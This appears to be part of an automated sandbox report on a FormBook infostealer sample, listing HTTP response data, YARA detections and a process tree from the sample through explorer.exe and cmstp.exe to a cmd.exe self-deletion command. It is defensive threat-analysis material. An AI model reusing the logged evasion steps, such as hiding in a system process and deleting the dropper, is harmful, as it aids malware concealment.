                                                                        ETag: "605db497-113"
                                                                        Via: 1.1 google
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                        Code Manipulations

                                                                        Statistics

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        Analysis Process: LWlcpDjYIQ.exe PID: 5524 Parent PID: 5708

                                                                        General

                                                                        Start time:13:00:12
                                                                        Start date:08/04/2021
                                                                        Path:C:\Users\user\Desktop\LWlcpDjYIQ.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Users\user\Desktop\LWlcpDjYIQ.exe'
                                                                        Imagebase:0x400000
                                                                        File size:206058 bytes
                                                                        MD5 hash:91523F8D438585534D9466432CC4665D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.220675052.000000001EB20000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.220675052.000000001EB20000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.220675052.000000001EB20000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:low

                                                                        Analysis Process: LWlcpDjYIQ.exe PID: 3664 Parent PID: 5524

                                                                        General

                                                                        Start time:13:00:13
                                                                        Start date:08/04/2021
                                                                        Path:C:\Users\user\Desktop\LWlcpDjYIQ.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Users\user\Desktop\LWlcpDjYIQ.exe'
                                                                        Imagebase:0x400000
                                                                        File size:206058 bytes
                                                                        MD5 hash:91523F8D438585534D9466432CC4665D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.256436700.00000000006E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.256436700.00000000006E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.256436700.00000000006E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000001.215824395.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000001.215824395.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000001.215824395.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.256399693.00000000006B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.256399693.00000000006B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.256399693.00000000006B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.256111645.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.256111645.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.256111645.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:low

                                                                        Analysis Process: explorer.exe PID: 3388 Parent PID: 3664

                                                                        General

                                                                        Start time:13:00:18
                                                                        Start date:08/04/2021
                                                                        Path:C:\Windows\explorer.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:
                                                                        Imagebase:0x7ff714890000
                                                                        File size:3933184 bytes
                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Analysis Process: cmstp.exe PID: 5796 Parent PID: 3388

                                                                        General

                                                                        Start time:13:00:32
                                                                        Start date:08/04/2021
                                                                        Path:C:\Windows\SysWOW64\cmstp.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\SysWOW64\cmstp.exe
                                                                        Imagebase:0x220000
                                                                        File size:82944 bytes
                                                                        MD5 hash:4833E65ED211C7F118D4A11E6FB58A09
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.474138939.00000000002D0000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.474138939.00000000002D0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.474138939.00000000002D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.475870538.0000000002840000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.475870538.0000000002840000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.475870538.0000000002840000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:moderate

                                                                        Analysis Process: cmd.exe PID: 6136 Parent PID: 5796

                                                                        General

                                                                        Start time:13:00:36
                                                                        Start date:08/04/2021
                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:/c del 'C:\Users\user\Desktop\LWlcpDjYIQ.exe'
                                                                        Imagebase:0x9d0000
                                                                        File size:232960 bytes
                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Analysis Process: conhost.exe PID: 400 Parent PID: 6136

                                                                        General

                                                                        Start time:13:00:37
                                                                        Start date:08/04/2021
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6b2800000
                                                                        File size:625664 bytes
                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Disassembly

                                                                        Code Analysis

                                                                        Reset < >